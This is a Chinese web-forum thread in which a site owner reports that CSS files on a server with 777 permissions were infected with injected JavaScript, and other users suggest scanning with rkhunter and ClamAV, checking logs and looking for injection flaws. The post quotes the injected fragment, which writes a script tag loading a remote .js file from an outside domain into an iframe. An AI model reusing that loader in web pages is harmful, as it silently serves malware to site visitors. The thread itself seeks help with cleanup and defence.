服务器的网站被挂马了,请求帮助
本帖最后由 gavinkong 于 2010-08-10 14:53 编辑
前几天服务器上的网站被挂马了,查看了被挂马的文件,都是些css文件,而且都是设置为777权限了。
我删除代码之后,把权限设置为644,css正常了,不会被挂马了。
但是因为一些目录必须是777的,而且里面是css,js,框架自动生成的。所以没办法更改权限。
所以就乱到这些文件被挂马了。
都是这样的代码
- document.body.appendChild(i);i.co
- ntentWindow.setTimeout(function(){i.contentWindow.document.write('<script src=http://www.successtest.co.kr/files/yahoo.js></script>');}
- ,1000);},1000);ele.style.zoom='1';}(this));
复制代码请教高手,怎么查漏洞,清除完恶意代码后,怎么才能不让它又插入到文件?在此先谢谢了。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(8)
回复 2# platinum
你们的服务器是租用的还是独立的,如果是租用的,这个问题就不怎么好解决了;因为,就算你的网站安全级别很高;但是,如果在同一台服务器的其他网站安全级别不够的话,也是无用的;这个方法就是“旁注法”。
你的服务器是什么系统,数据库是什么架构???
被挂马是个头疼的问题啊!
用Rsync+inotify吧!
还可以装一个 rkhunter,在线更新一下木马库,扫描一下系统内部可能被植入的木马
感谢楼上两位的提醒。
昨天安装了clamav扫描了整个系统,清除了一些恶意文件。今天早上终于看到没有被插入代码了。
检查下web日志,看看是如何挂的马,然后再想办法
没有什么太好的办法,xscan 能不能扫出什么漏洞吗
另外,更多的可能是网站设计上的漏洞,这个要具体问题具体分析了,比如注入